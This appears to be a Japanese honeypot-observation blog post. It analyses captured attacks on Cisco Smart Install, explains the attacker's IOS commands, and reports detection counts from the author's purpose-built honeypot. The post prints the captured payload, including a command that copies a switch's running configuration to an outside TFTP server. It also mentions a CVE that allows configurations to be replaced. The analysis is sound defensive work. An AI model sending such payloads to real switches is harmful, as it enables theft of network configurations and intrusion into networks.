www.morihi-soc.net

誰もが安心して使える、安全なインターネットを目指して

ハニーポット観察記録(45)「Cisco Smart Install に対する攻撃」

どうも。ハニーポッターの森久です。

今回は Cisco 製スイッチが利用する Cisco Smart Install に対する攻撃を取り上げます。
JPCERT/CC によると、インターネット定点観測システム (TSUBAME) で Cisco Smart Install が使用する4786/tcpポートのスキャンが増加しているとのことです(4月5日時点)。
また NICT の NICTER のダークネット観測でも同様に、3月30日から攻撃が活発化しているとの情報公開されていました。

Cisco Smart Install に対する攻撃手法ですが、すでに攻撃コードが一般公開されています。またスキャンが増加しているとのことなので、ハニーポットで容易に攻撃を検知できそうと推測しました。

私が開発した WOWHoneypot は、HTTP に特化したハニーポットであるため、この攻撃には対応していません。
そこで Cisco Smart Install 専用のハニーポットである csi-honeypot を作成しました。ソースコードは GitHub にて公開しています。

csi-honeypot
https://github.com/morihisa/csi-honeypot

この cis-honeypot は、Cisco Smart Install を狙った攻撃に対して、脆弱なように振る舞う低対話型のハニーポットです。

ハニーポットを植えてみた所、あんのじょう攻撃を検知しました。ということで紹介します。

攻撃サンプル紹介

\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x08\x00
\x00\x04\x08\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00
\x00\x00\xfc\x99G7\x86`\x00\x00\x00\x03\x03\xf4
copy system:running-config flash:/config.text\x00\x00\x00
\x00\x00\x00\x00\x00(中略)\x00\x00\x00\x00\x00\x00
\x00\x00copy flash:/config.text tftp://172.247.116.76/*.*.*.*.conf
\x00\x00\x00\x00\x00\x00\x00\x00(後略)

※一部の情報を意図的に伏せています。省略した部分はすべて\x00です。

\x00などの\xからはじまるデータは、16進数であり可読ではありません。

パッと見て読み取れる IOS コマンドは2つあります。

コマンド1

copy system:running-config flash:/config.text

copy コマンドは1つ目の引数のファイルを2つ目の引数のファイルへ複製します。
ここでは1つ目の引数に system 領域の running-config が指定されています。このファイルは、Cisco スイッチに現在読み込まれている設定ファイルのことを指します。
2つ目の引数に flash 領域の config.text が指定されています。この領域はフラッシュメモリです。
このコマンド1は、要するに実行中の設定ファイルをフラッシュに保存するという意味です。

コマンド2

copy flash:/config.text tftp://172.247.116.76/*.*.*.*.conf

次のコマンドは、1つ目の引数にコマンド1で保存した設定ファイルが指定されています。
2つ目の引数にスキーマが tftp で、172からはじまるグローバル IP アドレスが指定されています。アスタリスク(*)の部分は、ハニーポットのグローバル IP アドレスになっていました。

tftp は UDP を使ったファイル転送のプロトコルです。
このコマンド2の意味は、保存したファイルを172から始まるグローバル IP アドレスの tftp サーバへアップロードする、ということになります。
なおファイルの名前に攻撃対象のグローバル IP アドレスを含めることによって、攻撃可能なホストを管理しようとする意図を感じます。

コマンド1と2から、今回の攻撃者は脆弱な Cisco スイッチの設定ファイルを窃取することが目的だったと考えられます。

私のハニーポットでは設定ファイルを外部へアップロードする攻撃だけ検知していました。
しかしながら、別の脆弱性(CVE-2018-0171)を使うことによって外部の tftp サーバから、攻撃対象へ設定ファイルをダウンロードさせて置き換えることも可能です。実際、政治的なメッセージを残すために利用されたとのニュースも出ています(The Hacker News)。

 

攻撃検知状況

私が管理するハニーポットのうち、3台に csi-honeypot を植えてみました。2018年4月20日から28日までの検知状況を次の図に示します。

どのハニーポットでも1日1回はスキャンを検知しています。
しかし JPCERT/CC の TSUBAME や NICT の NICTER の3月末ごろの観測状況と比較すると、件数が非常に少ないです。
観測するセンサー(私の場合はハニーポット)の総数の違いの可能性もありますが、攻撃の流行が過ぎて収まってきたという可能性も考えられます。

 

まとめ

今回は Cisco Smart Install に対する攻撃を紹介しました。
実行を試みていたコマンドは、Cisco スイッチの設定ファイルを tftp でアップロードするというもので、設定情報の窃取が目的だったと考えられます。
また私のハニーポット環境では、攻撃を検知しているものの、他の場所の観測状況と比較して非常に少ない件数でした。
今後も引き続き、攻撃の傾向を注視していこうと思います。

なお情報が公開されてから1ヶ月以上経過しているため、すでに対応済みかと思いますが、古い  IOS バージョンの Cisco スイッチを利用している場合は、設定ファイルの内容を念のため確認することを推奨します。

 

参考情報

Critical Infrastructure at Risk: Advanced Actors Target Smart Install Client(Cisco Talos)
https://blog.talosintelligence.com/2018/04/critical-infrastructure-at-risk.html

Cisco Smart Install Client を悪用する攻撃に関する注意喚起(JPCERT/CC)
https://www.jpcert.or.jp/at/2018/at180013.html

Cisco Smart Install プロトコルを狙った攻撃の急増(NICTER Blog)
http://blog.nicter.jp/reports/2018-03/cisco-switch-hack/

Here’s how hackers are targeting Cisco Network Switches in Russia and Iran(The Hacker News)
https://thehackernews.com/2018/04/hacking-cisco-smart-install.html

 

Written by 森久

4月 29th, 2018 at 6:25 pm